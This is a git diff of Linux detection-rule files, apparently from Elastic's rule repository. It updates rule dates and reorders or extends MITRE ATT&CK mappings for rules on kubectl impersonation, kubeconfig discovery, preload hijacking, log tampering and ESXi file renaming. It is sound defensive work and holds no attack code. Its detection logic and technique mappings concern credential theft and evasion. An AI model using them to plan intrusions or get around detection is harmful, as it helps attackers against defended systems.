b/rules/linux/defense_evasion_multi_base64_decoding_attempt.toml @@ -2,7 +2,7 @@ creation_date = "2025/07/24" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -120,45 +120,50 @@ sequence by process.parent.entity_id with maxspan=3s [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Defense Evasion" - id = "TA0005" - reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat.technique]] +id = "T1027" +name = "Obfuscated Files or Information" +reference = "https://attack.mitre.org/techniques/T1027/" - [[rule.threat.technique]] - name = "Obfuscated Files or Information" - id = "T1027" - reference = "https://attack.mitre.org/techniques/T1027/" +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" - [[rule.threat.technique]] - name = "Deobfuscate/Decode Files or Information" - id = "T1140" - reference = "https://attack.mitre.org/techniques/T1140/" +[[rule.threat.technique]] +id = "T1140" +name = "Deobfuscate/Decode Files or Information" +reference = "https://attack.mitre.org/techniques/T1140/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Execution" - id = "TA0002" - reference = "https://attack.mitre.org/tactics/TA0002/" - - [[rule.threat.technique]] - id = "T1059" - name = "Command and Scripting Interpreter" - reference = "https://attack.mitre.org/techniques/T1059/" - - [[rule.threat.technique.subtechnique]] - name = "Unix Shell" - id = "T1059.004" - reference = "https://attack.mitre.org/techniques/T1059/004/" - - [[rule.threat.technique]] - name = "User Execution" - id = "T1204" - reference = "https://attack.mitre.org/techniques/T1204/" - - [[rule.threat.technique.subtechnique]] - name = "Malicious File" - id = "T1204.002" - reference = "https://attack.mitre.org/techniques/T1204/002/" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/defense_evasion_potential_kubectl_impersonation.toml b/rules/linux/defense_evasion_potential_kubectl_impersonation.toml index 105dced6160..2b82e6a07b1 100644 --- a/rules/linux/defense_evasion_potential_kubectl_impersonation.toml +++ b/rules/linux/defense_evasion_potential_kubectl_impersonation.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "cloud maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/05" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -124,6 +124,11 @@ not process.parent.args like ("/snap/microk8s/*/apiservice-kicker", "/snap/micro [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" @@ -134,11 +139,6 @@ id = "T1550.001" name = "Application Access Token" reference = "https://attack.mitre.org/techniques/T1550/001/" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" @@ -147,17 +147,30 @@ reference = "https://attack.mitre.org/tactics/TA0005/" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1552" -name = "Unsecured Credentials" -reference = "https://attack.mitre.org/techniques/T1552/" - [[rule.threat.technique]] id = "T1528" name = "Steal Application Access Token" reference = "https://attack.mitre.org/techniques/T1528/" +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/defense_evasion_potential_kubectl_masquerading.toml b/rules/linux/defense_evasion_potential_kubectl_masquerading.toml index f68521c8f2e..fb320b6a01b 100644 --- a/rules/linux/defense_evasion_potential_kubectl_masquerading.toml +++ b/rules/linux/defense_evasion_potential_kubectl_masquerading.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "cloud_de maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/05" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -153,7 +153,43 @@ id = "T1564" name = "Hide Artifacts" reference = "https://attack.mitre.org/techniques/T1564/" +[[rule.threat.technique.subtechnique]] +id = "T1564.001" +name = "Hidden Files and Directories" +reference = "https://attack.mitre.org/techniques/T1564/001/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1613" +name = "Container and Resource Discovery" +reference = "https://attack.mitre.org/techniques/T1613/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1609" +name = "Container Administration Command" +reference = "https://attack.mitre.org/techniques/T1609/" + +[[rule.threat.technique]] +id = "T1610" +name = "Deploy Container" +reference = "https://attack.mitre.org/techniques/T1610/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/defense_evasion_rename_esxi_files.toml b/rules/linux/defense_evasion_rename_esxi_files.toml index 42658fe2b44..e6c652ffe72 100644 --- a/rules/linux/defense_evasion_rename_esxi_files.toml +++ b/rules/linux/defense_evasion_rename_esxi_files.toml @@ -2,7 +2,7 @@ creation_date = "2023/04/11" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -123,3 +123,16 @@ reference = "https://attack.mitre.org/techniques/T1036/003/" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1486" +name = "Data Encrypted for Impact" +reference = "https://attack.mitre.org/techniques/T1486/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/linux/defense_evasion_sus_utility_executed_via_tmux_or_screen.toml b/rules/linux/defense_evasion_sus_utility_executed_via_tmux_or_screen.toml index 215cc1c7e9e..3ea1172cea6 100644 --- a/rules/linux/defense_evasion_sus_utility_executed_via_tmux_or_screen.toml +++ b/rules/linux/defense_evasion_sus_utility_executed_via_tmux_or_screen.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/04" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -92,3 +92,47 @@ reference = "https://attack.mitre.org/techniques/T1218/" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1033" +name = "System Owner/User Discovery" +reference = "https://attack.mitre.org/techniques/T1033/" + +[[rule.threat.technique]] +id = "T1046" +name = "Network Service Discovery" +reference = "https://attack.mitre.org/techniques/T1046/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/defense_evasion_suspicious_path_mounted.toml b/rules/linux/defense_evasion_suspicious_path_mounted.toml index 33accceabc2..fd5d32f0a2c 100644 --- a/rules/linux/defense_evasion_suspicious_path_mounted.toml +++ b/rules/linux/defense_evasion_suspicious_path_mounted.toml @@ -3,7 +3,7 @@ creation_date = "2025/04/25" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -114,6 +114,11 @@ id = "T1564" name = "Hide Artifacts" reference = "https://attack.mitre.org/techniques/T1564/" +[[rule.threat.technique.subtechnique]] +id = "T1564.013" +name = "Bind Mounts" +reference = "https://attack.mitre.org/techniques/T1564/013/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" diff --git a/rules/linux/defense_evasion_symlink_binary_to_writable_dir.toml b/rules/linux/defense_evasion_symlink_binary_to_writable_dir.toml index 5f5aad743d2..144405b249b 100644 --- a/rules/linux/defense_evasion_symlink_binary_to_writable_dir.toml +++ b/rules/linux/defense_evasion_symlink_binary_to_writable_dir.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/02" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -90,26 +90,25 @@ process.parent.args:(/usr/bin/qemu-aarch64-static or /usr/sbin/weak-modules or / [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Defense Evasion" - id = "TA0005" - reference = "https://attack.mitre.org/tactics/TA0005/" - - [[rule.threat.technique]] - name = "Hijack Execution Flow" - id = "T1574" - reference = "https://attack.mitre.org/techniques/T1574/" - - [[rule.threat.technique]] - name = "Indirect Command Execution" - id = "T1202" - reference = "https://attack.mitre.org/techniques/T1202/" - - [[rule.threat.technique]] - name = "Hide Artifacts" - id = "T1564" - reference = "https://attack.mitre.org/techniques/T1564/" - +[[rule.threat.technique]] +id = "T1202" +name = "Indirect Command Execution" +reference = "https://attack.mitre.org/techniques/T1202/" + +[[rule.threat.technique]] +id = "T1564" +name = "Hide Artifacts" +reference = "https://attack.mitre.org/techniques/T1564/" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.new_terms] field = "new_terms_fields" value = ["host.id", "process.parent.name"] diff --git a/rules/linux/defense_evasion_sysctl_kernel_feature_activity.toml b/rules/linux/defense_evasion_sysctl_kernel_feature_activity.toml index b1e0758e17c..4f3b999ca1c 100644 --- a/rules/linux/defense_evasion_sysctl_kernel_feature_activity.toml +++ b/rules/linux/defense_evasion_sysctl_kernel_feature_activity.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/29" integration = ["endpoint", "crowdstrike"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -105,25 +105,30 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -name = "Defense Evasion" -id = "TA0005" -reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat.technique]] +id = "T1553" +name = "Subvert Trust Controls" +reference = "https://attack.mitre.org/techniques/T1553/" [[rule.threat.technique]] -name = "Impair Defenses" id = "T1562" +name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" [[rule.threat.technique.subtechnique]] -name = "Indicator Blocking" +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + +[[rule.threat.technique.subtechnique]] id = "T1562.006" +name = "Indicator Blocking" reference = "https://attack.mitre.org/techniques/T1562/006/" -[[rule.threat.technique]] -name = "Subvert Trust Controls" -id = "T1553" -reference = "https://attack.mitre.org/techniques/T1553/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [[rule.threat]] framework = "MITRE ATT&CK" diff --git a/rules/linux/defense_evasion_unusual_preload_env_vars.toml b/rules/linux/defense_evasion_unusual_preload_env_vars.toml index fb5343a26bc..518e5acd500 100644 --- a/rules/linux/defense_evasion_unusual_preload_env_vars.toml +++ b/rules/linux/defense_evasion_unusual_preload_env_vars.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/16" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -147,6 +147,23 @@ id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[[rule.threat.technique.subtechnique]] +id = "T1574.006" +name = "Dynamic Linker Hijacking" +reference = "https://attack.mitre.org/techniques/T1574/006/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [rule.new_terms] field = "new_terms_fields" value = ["process.env_vars"] diff --git a/rules/linux/defense_evasion_user_or_group_deletion.toml b/rules/linux/defense_evasion_user_or_group_deletion.toml index dcf6cbd1ec0..697f60f577e 100644 --- a/rules/linux/defense_evasion_user_or_group_deletion.toml +++ b/rules/linux/defense_evasion_user_or_group_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/08" integration = ["system"] maturity = "production" -updated_date = "2026/01/12" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -94,3 +94,16 @@ reference = "https://attack.mitre.org/techniques/T1070/" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1531" +name = "Account Access Removal" +reference = "https://attack.mitre.org/techniques/T1531/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/linux/defense_evasion_var_log_file_creation_by_unsual_process.toml b/rules/linux/defense_evasion_var_log_file_creation_by_unsual_process.toml index 533fff59b87..9913c5751ec 100644 --- a/rules/linux/defense_evasion_var_log_file_creation_by_unsual_process.toml +++ b/rules/linux/defense_evasion_var_log_file_creation_by_unsual_process.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/11" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -103,6 +103,16 @@ not process.executable:("./usr/bin/podman" or "./install" or /tmp/vmis.*/install [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1070" +name = "Indicator Removal" +reference = "https://attack.mitre.org/techniques/T1070/" + +[[rule.threat.technique.subtechnique]] +id = "T1070.002" +name = "Clear Linux or Mac System Logs" +reference = "https://attack.mitre.org/techniques/T1070/002/" + [[rule.threat.technique]] id = "T1564" name = "Hide Artifacts" @@ -143,7 +153,6 @@ framework = "MITRE ATT&CK" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [rule.new_terms] field = "new_terms_fields" value = ["file.path", "process.executable"] diff --git a/rules/linux/discovery_docker_socket_discovery.toml b/rules/linux/discovery_docker_socket_discovery.toml index 33a3be52adf..73630bb0d5a 100644 --- a/rules/linux/discovery_docker_socket_discovery.toml +++ b/rules/linux/discovery_docker_socket_discovery.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_ maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/05" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -132,3 +132,16 @@ reference = "https://attack.mitre.org/techniques/T1613/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1609" +name = "Container Administration Command" +reference = "https://attack.mitre.org/techniques/T1609/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/discovery_dynamic_linker_via_od.toml b/rules/linux/discovery_dynamic_linker_via_od.toml index 40420f501f9..242d0bcb4b7 100644 --- a/rules/linux/discovery_dynamic_linker_via_od.toml +++ b/rules/linux/discovery_dynamic_linker_via_od.toml @@ -2,7 +2,7 @@ creation_date = "2024/02/01" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -117,7 +117,30 @@ id = "T1057" name = "Process Discovery" reference = "https://attack.mitre.org/techniques/T1057/" +[[rule.threat.technique]] +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[[rule.threat.technique.subtechnique]] +id = "T1574.006" +name = "Dynamic Linker Hijacking" +reference = "https://attack.mitre.org/techniques/T1574/006/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/discovery_esxi_software_via_find.toml b/rules/linux/discovery_esxi_software_via_find.toml index a2e43bc8e59..ab2c7bb235d 100644 --- a/rules/linux/discovery_esxi_software_via_find.toml +++ b/rules/linux/discovery_esxi_software_via_find.toml @@ -2,7 +2,7 @@ creation_date = "2023/04/11" integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -113,6 +113,11 @@ not ?process.parent.executable == "/usr/lib/vmware/viewagent/bin/uninstall_viewa [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" + [[rule.threat.technique]] id = "T1518" name = "Software Discovery" diff --git a/rules/linux/discovery_esxi_software_via_grep.toml b/rules/linux/discovery_esxi_software_via_grep.toml index af3f9c6de0c..deab74f05b3 100644 --- a/rules/linux/discovery_esxi_software_via_grep.toml +++ b/rules/linux/discovery_esxi_software_via_grep.toml @@ -2,7 +2,7 @@ creation_date = "2023/04/11" integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -113,6 +113,11 @@ not ?process.parent.executable in ("/usr/share/qemu/init/qemu-kvm-init", "/etc/s [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" + [[rule.threat.technique]] id = "T1518" name = "Software Discovery" diff --git a/rules/linux/discovery_kernel_instrumentation_discovery_via_kprobes_and_tracefs.toml b/rules/linux/discovery_kernel_instrumentation_discovery_via_kprobes_and_tracefs.toml index 401470b341b..2206fa79cac 100644 --- a/rules/linux/discovery_kernel_instrumentation_discovery_via_kprobes_and_tracefs.toml +++ b/rules/linux/discovery_kernel_instrumentation_discovery_via_kprobes_and_tracefs.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/20" integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/02/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -92,6 +92,11 @@ id = "T1082" name = "System Information Discovery" reference = "https://attack.mitre.org/techniques/T1082/" +[[rule.threat.technique]] +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" diff --git a/rules/linux/discovery_kernel_module_enumeration.toml b/rules/linux/discovery_kernel_module_enumeration.toml index e78a5b7070c..d456bfc7ff6 100644 --- a/rules/linux/discovery_kernel_module_enumeration.toml +++ b/rules/linux/discovery_kernel_module_enumeration.toml @@ -2,7 +2,7 @@ creation_date = "2020/04/23" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -126,11 +126,15 @@ id = "T1082" name = "System Information Discovery" reference = "https://attack.mitre.org/techniques/T1082/" +[[rule.threat.technique]] +id = "T1518" +name = "Software Discovery" +reference = "https://attack.mitre.org/techniques/T1518/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - [rule.new_terms] field = "new_terms_fields" value = ["process.executable"] diff --git a/rules/linux/discovery_kernel_seeking.toml b/rules/linux/discovery_kernel_seeking.toml index f7159bd2840..d6403ec34ff 100644 --- a/rules/linux/discovery_kernel_seeking.toml +++ b/rules/linux/discovery_kernel_seeking.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/07" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -134,3 +134,16 @@ reference = "https://attack.mitre.org/techniques/T1014/" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1005" +name = "Data from Local System" +reference = "https://attack.mitre.org/techniques/T1005/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/linux/discovery_kernel_unpacking.toml b/rules/linux/discovery_kernel_unpacking.toml index 5fd3d44ce52..d41f42360fe 100644 --- a/rules/linux/discovery_kernel_unpacking.toml +++ b/rules/linux/discovery_kernel_unpacking.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/07" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -128,6 +128,11 @@ id = "T1014" name = "Rootkit" reference = "https://attack.mitre.org/techniques/T1014/" +[[rule.threat.technique]] +id = "T1140" +name = "Deobfuscate/Decode Files or Information" +reference = "https://attack.mitre.org/techniques/T1140/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" diff --git a/rules/linux/discovery_kubeconfig_file_discovery.toml b/rules/linux/discovery_kubeconfig_file_discovery.toml index 499b8b47ad0..48e5d0fee93 100644 --- a/rules/linux/discovery_kubeconfig_file_discovery.toml +++ b/rules/linux/discovery_kubeconfig_file_discovery.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/05" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -141,6 +141,11 @@ process where host.os.type == "linux" and event.type == "start" and event.action [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" + [[rule.threat.technique]] id = "T1613" name = "Container and Resource Discovery" @@ -150,3 +155,21 @@ reference = "https://attack.mitre.org/techniques/T1613/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + +[[rule.threat.technique.subtechnique]] +id = "T1552.001" +name = "Credentials In Files" +reference = "https://attack.mitre.org/techniques/T1552/001/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/linux/discovery_kubectl_permission_discovery.toml b/rules/linux/discovery_kubectl_permission_discovery.toml index 51b3731597f..de88fa301ea 100644 --- a/rules/linux/discovery_kubectl_permission_discovery.toml +++ b/rules/linux/discovery_kubectl_permission_discovery.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_ maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/05" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -118,6 +118,11 @@ process.name == "kubectl" and process.args == "auth" and process.args == "can-i" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1069" +name = "Permission Groups Discovery" +reference = "https://attack.mitre.org/techniques/T1069/" + [[rule.threat.technique]] id = "T1613" name = "Container and Resource Discovery" diff --git a/rules/linux/discovery_linux_hping_activity.toml b/rules/linux/discovery_linux_hping_activity.toml index 13cafc9195f..bd67464f5af 100644 --- a/rules/linux/discovery_linux_hping_activity.toml +++ b/rules/linux/discovery_linux_hping_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -128,14 +128,18 @@ process where host.os.type == "linux" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1046" +name = "Network Service Discovery" +reference = "https://attack.mitre.org/techniques/T1046/" + [[rule.threat.technique]] id = "T1082" name = "System Information Discovery" reference = "https://attack.mitre.org/techniques/T1082/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules/linux/discovery_linux_nping_activity.toml b/rules/linux/discovery_linux_nping_activity.toml index 0e020284684..309a3429afc 100644 --- a/rules/linux/discovery_linux_nping_activity.toml +++ b/rules/linux/discovery_linux_nping_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -128,14 +128,26 @@ process where host.os.type == "linux" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1046" name = "Network Service Discovery" reference = "https://attack.mitre.org/techniques/T1046/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1498" +name = "Network Denial of Service" +reference = "https://attack.mitre.org/techniques/T1498/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/linux/discovery_manual_mount_discovery_via_exports_or_fstab.toml b/rules/linux/discovery_manual_mount_discovery_via_exports_or_fstab.toml index 221cc4ff072..2ef9d22056f 100644 --- a/rules/linux/discovery_manual_mount_discovery_via_exports_or_fstab.toml +++ b/rules/linux/discovery_manual_mount_discovery_via_exports_or_fstab.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/25" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -116,6 +116,11 @@ id = "T1082" name = "System Information Discovery" reference = "https://attack.mitre.org/techniques/T1082/" +[[rule.threat.technique]] +id = "T1135" +name = "Network Share Discovery" +reference = "https://attack.mitre.org/techniques/T1135/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" diff --git a/rules/linux/discovery_pam_version_discovery.toml b/rules/linux/discovery_pam_version_discovery.toml index fd9295a70a0..c714e5ca09f 100644 --- a/rules/linux/discovery_pam_version_discovery.toml +++ b/rules/linux/discovery_pam_version_discovery.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/16" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -127,6 +127,11 @@ id = "T1082" name = "System Information Discovery" reference = "https://attack.mitre.org/techniques/T1082/" +[[rule.threat.technique]] +id = "T1518" +name = "Software Discovery" +reference = "https://attack.mitre.org/techniques/T1518/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" diff --git a/rules/linux/discovery_ping_sweep_detected.toml b/rules/linux/discovery_ping_sweep_detected.toml index 1cffefe920a..614d53eda9b 100644 --- a/rules/linux/discovery_ping_sweep_detected.toml +++ b/rules/linux/discovery_ping_sweep_detected.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/04" integration = ["endpoint", 